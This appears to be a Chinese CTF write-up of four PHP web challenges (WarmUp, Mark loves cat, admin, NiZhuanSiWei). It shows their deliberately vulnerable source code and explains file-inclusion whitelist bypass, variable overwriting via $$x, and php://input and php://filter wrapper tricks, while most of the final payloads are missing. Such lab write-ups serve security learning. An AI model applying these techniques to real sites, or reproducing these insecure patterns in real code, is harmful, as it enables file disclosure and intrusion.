程式碼審計
[HCTF 2018] WarmUp
檢視原始碼
訪問 source.php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
看到hint.php
利用indlue函式 檔案包含漏洞
../返回上一級目錄
[BJDCTF2020]Mark loves cat
dirsearch掃描發現是git洩露
githack.py下載得到原始檔 index.php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}index.php
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
flag.php
<?php
$flag = file_get_contents('/flag');
foreach迴圈導致變數覆蓋
foreach是用於陣列和物件的迴圈語句
-
<?PHP $authors = array( "Java", "PHP", "CSS", "HTML" ); foreach ( $authors as $val ) { echo $val . "\n"; } ?>
-
<?php //from ww w . ja va2s . c o m $myBook = array( "title" => "Learn PHP from www.w3cschool.cn", "author" => "www.w3cschool.cn", "pubYear" => 2000 ); foreach ( $myBook as $key => $value ) { echo "$key \n"; echo "$value \n"; } ?>
-
<?PHP /*www .j a va 2 s. c o m*/ $authors = array( "Java", "PHP", "CSS", "HTML" ); // Displays "Java PHP Javascript HTML"; foreach ( $authors as $val ) { if ( $val == "CSS" ) $val = "Javascript"; echo $val . " "; } print_r ( $authors ); ?>
可變變數
如果一個變數的值剛好是另一個變數的名字 就可以透過訪問一個變數來得到另一個變數
方法; 在此變數 之前加一個 $
例如 $$x相當於 $($x)
1.構造payoad
yds=flag
exit()也是輸出的一種
yds=flag被處理為 $yds=$flag
因為沒有傳入 $_GET和$_POST所以直接輸出exit()
$handsome = 'yds'; 使 yds=flag輸出handsome為flag{}
2.構造payload
經處理 $is=$flag輸出$flag 構造 flag=flag是為了exit(is)
[HCTF 2018]admin
開啟頁面什麼也沒有
檢視原始碼 發現登入註冊
註冊 admin-admin 顯示改賬號已被註冊過
隨便組測一個登入
在 change 介面看到
訪問
ok 404 nice!
看wp 參考連結BUUCTF [HCTF 2018]admin 1
程式碼審計到flag{}
是session=admin就能得到flag
利用工具
[ZJCTF 2019]NiZhuanSiWe
原始碼
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
file_get_contents把檔案讀到一個字串中
利用偽協議php://input繞過file_get_contents函式
讀取檔案裡的字串,要和 welcome to the zjctf相等
構造paylaod
flag被匹配掉了
嘗試讀取useless.php原始碼,用php://filter
base64解碼
看到__toString方法
構造payload讀取flag.php,將N替換為flag.php
訪問原始碼
